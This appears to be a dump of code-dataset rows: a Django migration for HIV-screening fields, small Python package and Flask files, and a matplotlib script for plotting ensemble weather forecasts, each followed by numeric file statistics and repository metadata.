name='treatment_supporter_age',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_supporter_gender',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_supporter_relationship',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treatment_suppoter',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='viral_load_results',
field=models.CharField(max_length=7, null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='art_referral_completed_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557898), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='art_referral_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557833), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='date_of_event',
field=models.DateField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 558119), null=True),
),
migrations.AlterField(
model_name='ovchivriskscreening',
name='referral_made_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 557588), null=True),
),
]
| 34.333333
| 109
| 0.574257
| 863
| 10,403
| 6.670915
| 0.128621
| 0.096925
| 0.251867
| 0.241793
| 0.894563
| 0.868508
| 0.758555
| 0.582421
| 0.466736
| 0.411846
| 0
| 0.021117
| 0.321734
| 10,403
| 302
| 110
| 34.44702
| 0.794785
| 0.002019
| 0
| 0.702703
| 0
| 0
| 0.224374
| 0.066089
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010135
| 0
| 0.02027
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f59118b39e19bb7f6d6c25addc5eeea94cd56be4
| 201
|
py
|
Python
|
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | 3
|
2018-10-24T07:07:44.000Z
|
2021-12-24T20:25:24.000Z
|
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | null | null | null |
dhtxmpp_componentd_watchdog/__main__.py
|
pendleto/dhtxmpp_component
|
f7b5f018b74d5d1bf34d175b6766677de9eaa987
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""dhtxmpp_componentd_watchdog.__main__: executed when dhtxmpp_componentd_watchdog directory is called as script."""
from .dhtxmpp_componentd_watchdog import main
main()
| 25.125
| 116
| 0.766169
| 24
| 201
| 6
| 0.666667
| 0.354167
| 0.520833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005714
| 0.129353
| 201
| 8
| 117
| 25.125
| 0.817143
| 0.661692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
1960b9ec9fef382b21fb8e1fd34659121ae0117c
| 28
|
py
|
Python
|
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
pyload/__init__.py
|
lrterry/py-load
|
c06ef979ee1761c5b9df642f5af5119da7ec09fe
|
[
"Apache-2.0"
] | null | null | null |
from pyload import __main__
| 14
| 27
| 0.857143
| 4
| 28
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
19912cff4c21129048112ac8354b6f08c99c1646
| 119
|
py
|
Python
|
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 5
|
2021-05-05T21:05:46.000Z
|
2021-05-12T19:19:34.000Z
|
app/schemas/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 1
|
2021-05-07T12:54:19.000Z
|
2021-05-07T12:54:19.000Z
|
from app.schemas.book_schema import BookSchema
from app.schemas.library_schema import LibrarySchema, LibraryBookSchema
| 39.666667
| 71
| 0.882353
| 15
| 119
| 6.866667
| 0.666667
| 0.135922
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07563
| 119
| 2
| 72
| 59.5
| 0.936364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
199d0a061df1f0260f95cafc2953d576ac4e5841
| 117
|
py
|
Python
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 24
|
2019-09-21T21:09:45.000Z
|
2022-03-15T19:48:13.000Z
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 54
|
2019-09-16T20:06:30.000Z
|
2021-08-18T22:22:08.000Z
|
app/settings/__init__.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 9
|
2019-09-08T13:35:55.000Z
|
2021-01-03T15:23:37.000Z
|
from flask import Blueprint
settings = Blueprint('settings', __name__, url_prefix='/settings')
from . import views
| 19.5
| 66
| 0.769231
| 14
| 117
| 6.071429
| 0.642857
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 117
| 5
| 67
| 23.4
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.145299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
5fdf09493492526f26506ac5d58d63878018df83
| 29
|
py
|
Python
|
onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | 9
|
2021-12-20T00:06:37.000Z
|
2021-12-26T21:52:34.000Z
|
onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | 1
|
2021-12-26T13:24:08.000Z
|
2021-12-27T12:23:25.000Z
|
onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | null | null | null |
from .invoice import Invoice
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5fea509ac22ae9ab1b9c6728249562f033579d89
| 40
|
py
|
Python
|
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
import query
import related
import stats
| 13.333333
| 14
| 0.875
| 6
| 40
| 5.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 40
| 3
| 15
| 13.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2731012bd4a51712d0c208738c7f22f2c8fd2fe9
| 57
|
py
|
Python
|
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | 1
|
2018-12-20T07:12:55.000Z
|
2018-12-20T07:12:55.000Z
|
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | null | null | null |
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | null | null | null |
from simplewebdavclient.simplewebdavclient import Client
| 28.5
| 56
| 0.912281
| 5
| 57
| 10.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 57
| 1
| 57
| 57
| 0.981132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
27389d0bc29351b7843e185c61fc6cf53baf98d7
| 13,957
|
py
|
Python
|
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[2]:
import sys
sys.path.append('/Volumes/SANDISK128/Documents/Thesis/Python/')
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import colormaps as cmaps
import save_fig as SF
import datetime
from datetime import date
# In[3]:
### Define colorbar colors
champ = 255.
blue = np.array([1,74,159])/champ # for the date
vert_col = np.array([197,197,197])/champ # vertical line for day marker
# In[4]:
def dates_plt(time_ml):
dt = []
dd = []
dm = []
dy = []
for i in range(0,time_ml.shape[0],6):
dt.append(datetime.datetime.utcfromtimestamp(time_ml[i]).hour)
dd.append(datetime.datetime.utcfromtimestamp(time_ml[i]).day)
dm.append(datetime.datetime.utcfromtimestamp(time_ml[i]).month)
dy.append(datetime.datetime.utcfromtimestamp(time_ml[i]).year)
xt = []
t1 = '%s-%s-%s' %(dy[0],dm[0],dd[0])
xt.append(t1)
for i in range(1,4):
xt.append('%s' %dt[i])
t2 = '%s-%s-%s' %(dy[4],dm[4],dd[4])
xt.append(t2)
for i in range(5,8):
xt.append('%s' %dt[i])
if np.asarray(dt).size >8:
t3 = '%s-%s-%s' %(dy[8],dm[8],dd[8])
xt.append(t3)
elif np.asarray(dt).size >9:
for i in range(9,12):
xt.append('%s' %dt[i])
else:
xt
return(xt);
# def dates_plt_18(time_ml):
# dt = []
# dd = []
# dm = []
# dy = []
# for i in range(0,time_ml.shape[0],6):
# dt.append(datetime.datetime.utcfromtimestamp(time_ml[i]).hour)
# dd.append(datetime.datetime.utcfromtimestamp(time_ml[i]).day)
# dm.append(datetime.datetime.utcfromtimestamp(time_ml[i]).month)
# dy.append(datetime.datetime.utcfromtimestamp(time_ml[i]).year)
#
#
# xt = []
# for i in range(0,1):
# xt.append('%s' %dt[i])
# t1 = '%s-%s-%s' %(dy[1],dm[1],dd[1])
# xt.append(t1)
# for i in range(2,5):
# xt.append('%s' %dt[i])
# t2 = '%s-%s-%s' %(dy[5],dm[5],dd[5])
# xt.append(t2)
# for i in range(6,9):
# xt.append('%s' %dt[i])
# if np.asarray(dt).size >9:
# t3 = '%s-%s-%s' %(dy[9],dm[9],dd[9])
# xt.append(t3)
# elif np.asarray(dt).size >10:
# for i in range(10,12):
# xt.append('%s' %dt[i])
# else:
# xt
# return(xt);
def dates_plt_00(h_p00, m_p00, d_p00, y_p00, ini_day ):
xt = []
t1 = '%s-%s-%s' %(y_p00[0][ini_day-1], m_p00[0][ini_day-1], d_p00[0][ini_day-1])
xt.append(t1)
for i in range(6,24,6):
xt.append('%s' %h_p00[i][ini_day-1])
t2 = '%s-%s-%s' %(y_p00[0][ini_day], m_p00[0][ini_day], d_p00[0][ini_day])
xt.append(t2)
for i in range(6,24,6):
xt.append('%s' %h_p00[i][ini_day])
t3 = '%s-%s-%s' %(y_p00[0][ini_day+1], m_p00[0][ini_day+1], d_p00[0][ini_day+1])
xt.append(t3)
return(xt);
def dates_plt_18(h_p18, m_p18, d_p18, y_p18, ini_day):
xt = []
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day-1])
t1 = '%s-%s-%s' %(y_p18[6][ini_day-1], m_p18[6][ini_day-1], d_p18[6][ini_day-1])
xt.append(t1)
for i in range(12,24,6):
xt.append('%s' %h_p18[i][ini_day-1])
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day])
t2 = '%s-%s-%s' %(y_p18[6][ini_day], m_p18[6][ini_day], d_p18[6][ini_day])
xt.append(t2)
for i in range(12,24,6):
xt.append('%s' %h_p18[i][ini_day])
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day+1])
return(xt);
levels = np.arange(0,0.6,0.02) # snowfall amount not divided by thickness
#levels = np.arange(0,9.5,0.32) # snowfall amount divided by thickness
# In[ ]:
def plot_vertical_EM0_1(time, height,result, time_ml, var_name, unit, maxim, Xmax, title):
fig = plt.figure(figsize=(20.,14.15))
gs = GridSpec(2, 2)
# title
fig.suptitle(title, y=0.95, color =blue, fontsize = 26)
for ens_memb in range(0,2):
if len(result[ens_memb]) == 0:
continue
### first 2 ens_memb
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(Xmax-0.5, Xmax+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 22,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), Xmax, height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,Xmax+1,6))
if ens_memb == 1:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 20)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 20)
ax0.set_xlabel('time', fontsize = 22)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 20)
ax0.set_ylabel('height [km]', fontsize = 22)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 20)
plt.subplots_adjust(hspace = 0.08)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 22)
cbar.ax.tick_params(labelsize = 20)
# In[ ]:
def plot_vertical_EM0_9(time, height,result, time_ml, var_name, unit, maxim, title):
fig = plt.figure(figsize=(14.15,20.))
gs = GridSpec(6, 2)
# title
fig.suptitle(title,y=0.9, color =blue, fontsize = 20)
#levels = np.arange(0,np.nanmax(maxim),0.015)
### first 2 ens_memb
for ens_memb in range(0,2):
if len(result[ens_memb]) == 0:
continue
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
if ens_memb == 1:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 16)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 16)
# ax0.set_xlabel('time', fontsize = 20)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 16)
ax0.set_ylabel('height [km]', fontsize = 20)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 16)
plt.subplots_adjust(hspace = 0.5)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 20)
cbar.ax.tick_params(labelsize = 18)
pos = []
pos.append(0)
pos.append(0)
for i in range(2,6):
pos.append(i)
pos.append(i)
### left column:
for ens_memb in range(2,10,2):
if len(result[ens_memb]) == 0:
continue
ax2 = plt.subplot(gs[pos[ens_memb], :-1])
im2 = ax2.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)#, vmin=z_min, vmax=z_max)
ax2.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax2.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax2.yaxis.grid()
# Vertical line to show end of day
ax2.axvline(24,color = vert_col, linewidth = 3)
ax2.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
if np.asarray(dates).size <= 8.:
dates2 = [dates[0], '', '','',dates[4], '', '','']
else:
dates2 = [dates[0], '', '','',dates[4], '', '','',dates[8]]
# labels
ax2.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
ax2.set_ylabel('height [km]', fontsize = 20)
ax2.set_yticks(np.arange(0,3500.,500.))
ax2.set_yticklabels(yl, fontsize = 18)
if ens_memb == 8:
ax2.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on', labelsize = 16)
ax2.set_xticklabels(dates2, rotation = 25, fontsize = 16)
ax2.set_xlabel('time', fontsize = 20)
else:
ax2.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off', labelsize = 16)
# right column
for ens_memb in range(3,10,2):
if len(result[ens_memb]) == 0:
continue
ax3 = plt.subplot(gs[pos[ens_memb], -1:])
im2 = ax3.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)#, vmin=z_min, vmax=z_max)
ax3.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax3.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax3.yaxis.grid()
# Vertical line to show end of day
ax3.axvline(24,color = vert_col, linewidth = 3)
ax3.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
# labels
ax3.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
ax3.set_ylabel('height [km]', fontsize = 20)
ax3.set_yticks(np.arange(0,3500.,500.))
ax3.set_yticklabels(yl, fontsize = 18)
if ens_memb == 9:
ax3.tick_params(axis='both',which='both',bottom='on',top='off',left = 'off',labelbottom='on', labelleft = 'off',labelsize = 16)
ax3.set_xticklabels(dates2, rotation = 25, fontsize = 16)
ax3.set_xlabel('time', fontsize = 20)
else:
ax3.tick_params(axis='both',which='both',bottom='on',top='off',left = 'off',labelbottom='off', labelleft = 'off',labelsize = 16)
# In[ ]:
def plot_vertical_EM0_9_48h(time, height,result, time_ml, var_name, unit, maxim, Xmax, title):
fig = plt.figure(figsize=(14.15,20.))
gs = GridSpec(10, 2)
# title
fig.suptitle(title, y =0.9, color =blue, fontsize = 20)
# levels = np.arange(0,np.nanmax(maxim),0.015)
for ens_memb in range(0,10):
if len(result[ens_memb]) == 0:
continue
### first all ens_memb
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(Xmax-0.5, Xmax+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), Xmax, height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,Xmax+1,6))
if ens_memb == 9:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 16)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 16)
ax0.set_xlabel('time', fontsize = 20)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 16)
if ens_memb == 4:
plt.ylabel('height [km]', fontsize = 20)
# ax0.set_ylabel('height [km]', fontsize = 22)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 16)
plt.subplots_adjust(hspace = 0.15)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 20)
cbar.ax.tick_params(labelsize = 18)
| 37.721622
| 147
| 0.580354
| 2,132
| 13,957
| 3.689024
| 0.105066
| 0.058741
| 0.030769
| 0.023776
| 0.882772
| 0.852893
| 0.821996
| 0.778258
| 0.739733
| 0.714177
| 0
| 0.065794
| 0.238805
| 13,957
| 369
| 148
| 37.823848
| 0.674511
| 0.179623
| 0
| 0.526786
| 0
| 0
| 0.053375
| 0.003882
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026786
| false
| 0
| 0.035714
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
27407c70c28a7909385ae9be2d1564b97aa83b11
| 33
|
py
|
Python
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 2,919
|
2019-08-12T23:02:10.000Z
|
2022-03-31T21:59:34.000Z
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 317
|
2019-08-13T14:16:22.000Z
|
2022-03-26T08:44:06.000Z
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 466
|
2019-08-18T01:45:14.000Z
|
2022-03-31T08:11:53.000Z
|
from .dragonnet import DragonNet
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
27f20d9e43549901130b7b59aa8b02c56957e94e
| 26
|
py
|
Python
|
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
from .base import Dataset
| 13
| 25
| 0.807692
| 4
| 26
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fd6982553a0966b9046c0b3a91795ae54a42fd7b
| 225
|
py
|
Python
|
tests/__init__.py
|
jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | 1
|
2021-03-11T01:18:30.000Z
|
2021-03-11T01:18:30.000Z
|
tests/__init__.py
|
jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | 3
|
2020-03-24T18:05:39.000Z
|
2021-08-23T20:36:21.000Z
|
tests/__init__.py
|
